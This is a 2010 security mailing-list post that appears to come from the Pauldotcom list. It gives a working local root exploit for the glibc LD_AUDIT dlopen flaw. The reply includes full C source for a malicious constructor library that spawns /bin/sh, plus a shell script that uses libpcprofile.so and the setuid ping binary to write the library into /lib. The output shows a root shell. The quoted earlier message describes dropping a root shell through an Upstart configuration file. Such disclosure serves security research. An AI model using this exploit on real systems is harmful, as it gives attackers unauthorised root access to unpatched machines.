Re: Privilege scalation with GNU ld dlopen

[Xavier Garcia <xavi.garcia () gmail com>]

Hi guys,


I finally found an easier way to gain root privileges, without
rebooting the computer.


The vulnerability can be used to upload a custom library to the
server and then execute a root shell.

The library is really simple (libevil.so)

----

#include <errno.h>
#include <unistd.h>

static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

----

user@host:~/$ cat ./run.sh

umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so"
ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping


user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w
deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#


I hope it is helpful.

Regards,

Xavier Garcia




On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> Hi guys,
>
> I am trying to find some ways to gain root access by using the
> vulnerability described in the advisory
>
> http://marc.info/?l=full-disclosure&m=128776663124692&w=2
>
> published by Tavis Ormandy.
>
> The advisory states that Cron can be used to scalate privileges,
> but Cron does not accept files that are writable by the group or
> others, returning the error BAD FILE MODE.
>
> I have been looking for alternative ways to gain root access, but
> there are not many places where it is possible.
>
> I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> does not check the permissions and happily reads the
> configuration files every time it restarts. This means that we can
> create a configuration file that will instruct Upstart to
> drop a root shell :)
>
>
> The down side is that we have to be patient and wait until the
> computer is rebooted, or use some social engineering.
>
>
> You can find more details at
>
> http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
>
>
> I hope this finding is interesting or usefull for the list.
>
> Regards,
>
> Xavier Garcia
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com